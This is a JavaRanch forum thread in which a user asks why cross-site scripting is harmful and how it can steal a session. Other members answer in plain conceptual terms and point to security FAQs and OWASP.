aspose file tools*
The moose likes Security and the fly likes cross site scripting Big Moose Saloon
  Search | Java FAQ | Recent Topics | Flagged Topics | Hot Topics | Zero Replies
Register / Login


Win a copy of Soft Skills this week in the Jobs Discussion forum!
JavaRanch » Java Forums » Engineering » Security
Bookmark "cross site scripting" Watch "cross site scripting" New topic
Author

cross site scripting

David Spades
Ranch Hand

Joined: Feb 01, 2014
Posts: 234
I've been googling about cross site scripting. for now, I understand that it's a form of injecting malicious script into some input field which will then be saved into database. Can anybody show me why this is harmful? lets say I'm opening a personal information screen to apply for an online shopping website membership, I type in some malicious script into the first name field and submitted the form. the first name field will then be persisted to the website's database, so where's the harm? I'm still not following. can anybody please enlighten me on this issue? thanks
Ulf Dittmer
Marshal

Joined: Mar 22, 2005
Posts: 42913
    
  68
The harm is not in that script being stored on the server, the harm is in that script being executed when you call up a page that executes it (in your example that would be a page displaying your first name). But this is a big subject, and many treatises have been written about it; the http://www.coderanch.com/how-to/java/SecurityFaq#web-apps points to a couple of them that discuss XSS at length.
David Spades
Ranch Hand

Joined: Feb 01, 2014
Posts: 234
I just found out that cross site scripting can be used to steal your session. how does this work? Does the hacker need to have access to the victim's computer in order for this to work? thanks
Jeanne Boyarsky
author & internet detective
Marshal

Joined: May 26, 2003
Posts: 31057
    
232

David,
A XSS attack can send your session cookie to the hacker. See this OWASP page for other ways a hacker could steal your session cookie. And the attacker does not need access to the victim's computer for this to work.


[Blog] [JavaRanch FAQ] [How To Ask Questions The Smart Way] [Book Promos]
Blogging on Certs: SCEA Part 1, Part 2 & 3, Core Spring 3, OCAJP, OCPJP beta, TOGAF part 1 and part 2
 
I agree. Here's the link: http://aspose.com/file-tools
 
subject: cross site scripting